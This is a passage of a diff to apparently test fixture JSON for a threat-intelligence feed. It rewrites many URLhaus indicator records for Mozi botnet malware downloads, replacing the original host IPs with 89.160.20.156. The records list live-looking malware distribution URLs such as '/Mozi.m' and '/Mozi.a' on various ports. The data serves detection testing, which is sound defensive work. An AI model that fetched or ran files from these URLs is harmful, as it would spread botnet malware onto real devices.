"42.228.41.177", - "full": "http://42.228.41.177:52003/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52003/Mozi.m" }, - "ip": "42.228.41.177" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694559556Z", - "original": "{\"id\":\"960999\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960999/\",\"url\":\"http://42.228.41.177:52003/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.228.41.177\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028541300Z", + "original": "{\"id\":\"960999\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960999/\",\"url\":\"http://89.160.20.156:52003/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26835,18 +26835,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.170.18:39500/Mozi.m", + "original": "http://89.160.20.156:39500/Mozi.m", "scheme": "http", "port": 39500, - "domain": "117.222.170.18", - "full": "http://117.222.170.18:39500/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39500/Mozi.m" }, - "ip": "117.222.170.18" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694563153Z", - "original": "{\"id\":\"960995\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960995/\",\"url\":\"http://117.222.170.18:39500/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.170.18\",\"date_added\":\"2021-01-14 16:20:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028548900Z", + "original": "{\"id\":\"960995\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960995/\",\"url\":\"http://89.160.20.156:39500/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:16 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26884,18 +26884,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.165.141:36966/Mozi.m", + "original": "http://89.160.20.156:36966/Mozi.m", "scheme": "http", "port": 36966, - "domain": "115.58.165.141", - "full": "http://115.58.165.141:36966/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36966/Mozi.m" }, - "ip": "115.58.165.141" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694566520Z", - "original": "{\"id\":\"960994\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960994/\",\"url\":\"http://115.58.165.141:36966/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.165.141\",\"date_added\":\"2021-01-14 16:20:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028657800Z", + "original": "{\"id\":\"960994\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960994/\",\"url\":\"http://89.160.20.156:36966/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26933,18 +26933,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.247.206.204:59875/Mozi.m", + "original": "http://89.160.20.156:59875/Mozi.m", "scheme": "http", "port": 59875, - "domain": "117.247.206.204", - "full": "http://117.247.206.204:59875/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59875/Mozi.m" }, - "ip": "117.247.206.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694569846Z", - "original": "{\"id\":\"960991\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960991/\",\"url\":\"http://117.247.206.204:59875/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.247.206.204\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028664600Z", + "original": "{\"id\":\"960991\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960991/\",\"url\":\"http://89.160.20.156:59875/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -26982,18 +26982,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.222.171.220:44123/Mozi.m", + "original": "http://89.160.20.156:44123/Mozi.m", "scheme": "http", "port": 44123, - "domain": "117.222.171.220", - "full": "http://117.222.171.220:44123/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44123/Mozi.m" }, - "ip": "117.222.171.220" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694573432Z", - "original": "{\"id\":\"960992\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960992/\",\"url\":\"http://117.222.171.220:44123/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.222.171.220\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028671900Z", + "original": "{\"id\":\"960992\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960992/\",\"url\":\"http://89.160.20.156:44123/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27031,18 +27031,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.194.163.151:45224/Mozi.a", + "original": "http://89.160.20.156:45224/Mozi.a", "scheme": "http", "port": 45224, - "domain": "117.194.163.151", - "full": "http://117.194.163.151:45224/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45224/Mozi.a" }, - "ip": "117.194.163.151" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694576618Z", - "original": "{\"id\":\"960993\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960993/\",\"url\":\"http://117.194.163.151:45224/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.194.163.151\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028678400Z", + "original": "{\"id\":\"960993\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960993/\",\"url\":\"http://89.160.20.156:45224/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27080,18 +27080,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.143.46:43105/Mozi.m", + "original": "http://89.160.20.156:43105/Mozi.m", "scheme": "http", "port": 43105, - "domain": "115.63.143.46", - "full": "http://115.63.143.46:43105/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43105/Mozi.m" }, - "ip": "115.63.143.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694579835Z", - "original": "{\"id\":\"960990\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960990/\",\"url\":\"http://115.63.143.46:43105/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.143.46\",\"date_added\":\"2021-01-14 16:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028682900Z", + "original": "{\"id\":\"960990\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960990/\",\"url\":\"http://89.160.20.156:43105/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27129,18 +27129,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://120.85.208.36:46011/Mozi.m", + "original": "http://89.160.20.156:46011/Mozi.m", "scheme": "http", "port": 46011, - "domain": "120.85.208.36", - "full": "http://120.85.208.36:46011/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46011/Mozi.m" }, - "ip": "120.85.208.36" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694583461Z", - "original": "{\"id\":\"960984\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960984/\",\"url\":\"http://120.85.208.36:46011/Mozi.m\",\"url_status\":\"online\",\"host\":\"120.85.208.36\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028688300Z", + "original": "{\"id\":\"960984\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960984/\",\"url\":\"http://89.160.20.156:46011/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27178,18 +27178,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.58.48.66:51170/Mozi.m", + "original": "http://89.160.20.156:51170/Mozi.m", "scheme": "http", "port": 51170, - "domain": "115.58.48.66", - "full": "http://115.58.48.66:51170/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51170/Mozi.m" }, - "ip": "115.58.48.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694586828Z", - "original": "{\"id\":\"960985\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960985/\",\"url\":\"http://115.58.48.66:51170/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.58.48.66\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028697900Z", + "original": "{\"id\":\"960985\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960985/\",\"url\":\"http://89.160.20.156:51170/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27227,18 +27227,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://115.50.229.51:38025/Mozi.a", + "original": "http://89.160.20.156:38025/Mozi.a", "scheme": "http", "port": 38025, - "domain": "115.50.229.51", - "full": "http://115.50.229.51:38025/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38025/Mozi.a" }, - "ip": "115.50.229.51" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694590184Z", - "original": "{\"id\":\"960986\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960986/\",\"url\":\"http://115.50.229.51:38025/Mozi.a\",\"url_status\":\"online\",\"host\":\"115.50.229.51\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028704800Z", + "original": "{\"id\":\"960986\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960986/\",\"url\":\"http://89.160.20.156:38025/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27276,18 +27276,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.55.213.63:54132/Mozi.m", + "original": "http://89.160.20.156:54132/Mozi.m", "scheme": "http", "port": 54132, - "domain": "115.55.213.63", - "full": "http://115.55.213.63:54132/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54132/Mozi.m" }, - "ip": "115.55.213.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694593580Z", - "original": "{\"id\":\"960987\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960987/\",\"url\":\"http://115.55.213.63:54132/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.55.213.63\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028711600Z", + "original": "{\"id\":\"960987\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960987/\",\"url\":\"http://89.160.20.156:54132/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27325,18 +27325,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.43.210.102:57705/Mozi.m", + "original": "http://89.160.20.156:57705/Mozi.m", "scheme": "http", "port": 57705, - "domain": "125.43.210.102", - "full": "http://125.43.210.102:57705/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57705/Mozi.m" }, - "ip": "125.43.210.102" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694596856Z", - "original": "{\"id\":\"960988\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960988/\",\"url\":\"http://125.43.210.102:57705/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.210.102\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028718400Z", + "original": "{\"id\":\"960988\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960988/\",\"url\":\"http://89.160.20.156:57705/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27374,18 +27374,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.14.38.9:32983/Mozi.m", + "original": "http://89.160.20.156:32983/Mozi.m", "scheme": "http", "port": 32983, - "domain": "123.14.38.9", - "full": "http://123.14.38.9:32983/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32983/Mozi.m" }, - "ip": "123.14.38.9" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694600253Z", - "original": "{\"id\":\"960989\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960989/\",\"url\":\"http://123.14.38.9:32983/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.14.38.9\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028741700Z", + "original": "{\"id\":\"960989\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960989/\",\"url\":\"http://89.160.20.156:32983/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:20:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27423,18 +27423,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.254.197.92:47908/Mozi.m", + "original": "http://89.160.20.156:47908/Mozi.m", "scheme": "http", "port": 47908, - "domain": "113.254.197.92", - "full": "http://113.254.197.92:47908/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47908/Mozi.m" }, - "ip": "113.254.197.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694603409Z", - "original": "{\"id\":\"960983\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960983/\",\"url\":\"http://113.254.197.92:47908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"113.254.197.92\",\"date_added\":\"2021-01-14 16:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028748400Z", + "original": "{\"id\":\"960983\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960983/\",\"url\":\"http://89.160.20.156:47908/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:13 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27472,18 +27472,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.89.245.89:35116/Mozi.m", + "original": "http://89.160.20.156:35116/Mozi.m", "scheme": "http", "port": 35116, - "domain": "113.89.245.89", - "full": "http://113.89.245.89:35116/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35116/Mozi.m" }, - "ip": "113.89.245.89" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694606995Z", - "original": "{\"id\":\"960982\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960982/\",\"url\":\"http://113.89.245.89:35116/Mozi.m\",\"url_status\":\"offline\",\"host\":\"113.89.245.89\",\"date_added\":\"2021-01-14 16:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028755100Z", + "original": "{\"id\":\"960982\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960982/\",\"url\":\"http://89.160.20.156:35116/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27521,18 +27521,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.50.159.25:38070/Mozi.m", + "original": "http://89.160.20.156:38070/Mozi.m", "scheme": "http", "port": 38070, - "domain": "115.50.159.25", - "full": "http://115.50.159.25:38070/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38070/Mozi.m" }, - "ip": "115.50.159.25" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694610372Z", - "original": "{\"id\":\"960978\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960978/\",\"url\":\"http://115.50.159.25:38070/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.159.25\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028761800Z", + "original": "{\"id\":\"960978\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960978/\",\"url\":\"http://89.160.20.156:38070/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27570,18 +27570,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.252.130.226:53399/Mozi.m", + "original": "http://89.160.20.156:53399/Mozi.m", "scheme": "http", "port": 53399, - "domain": "112.252.130.226", - "full": "http://112.252.130.226:53399/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53399/Mozi.m" }, - "ip": "112.252.130.226" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694613608Z", - "original": "{\"id\":\"960979\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960979/\",\"url\":\"http://112.252.130.226:53399/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.252.130.226\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028768500Z", + "original": "{\"id\":\"960979\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960979/\",\"url\":\"http://89.160.20.156:53399/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27619,18 +27619,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.30.4.60:39529/Mozi.m", + "original": "http://89.160.20.156:39529/Mozi.m", "scheme": "http", "port": 39529, - "domain": "112.30.4.60", - "full": "http://112.30.4.60:39529/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39529/Mozi.m" }, - "ip": "112.30.4.60" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694616844Z", - "original": "{\"id\":\"960980\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960980/\",\"url\":\"http://112.30.4.60:39529/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.30.4.60\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028775Z", + "original": "{\"id\":\"960980\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960980/\",\"url\":\"http://89.160.20.156:39529/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27668,18 +27668,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.234.156.209:33465/Mozi.m", + "original": "http://89.160.20.156:33465/Mozi.m", "scheme": "http", "port": 33465, - "domain": "112.234.156.209", - "full": "http://112.234.156.209:33465/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33465/Mozi.m" }, - "ip": "112.234.156.209" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694620080Z", - "original": "{\"id\":\"960981\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960981/\",\"url\":\"http://112.234.156.209:33465/Mozi.m\",\"url_status\":\"offline\",\"host\":\"112.234.156.209\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028781800Z", + "original": "{\"id\":\"960981\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960981/\",\"url\":\"http://89.160.20.156:33465/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:19:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 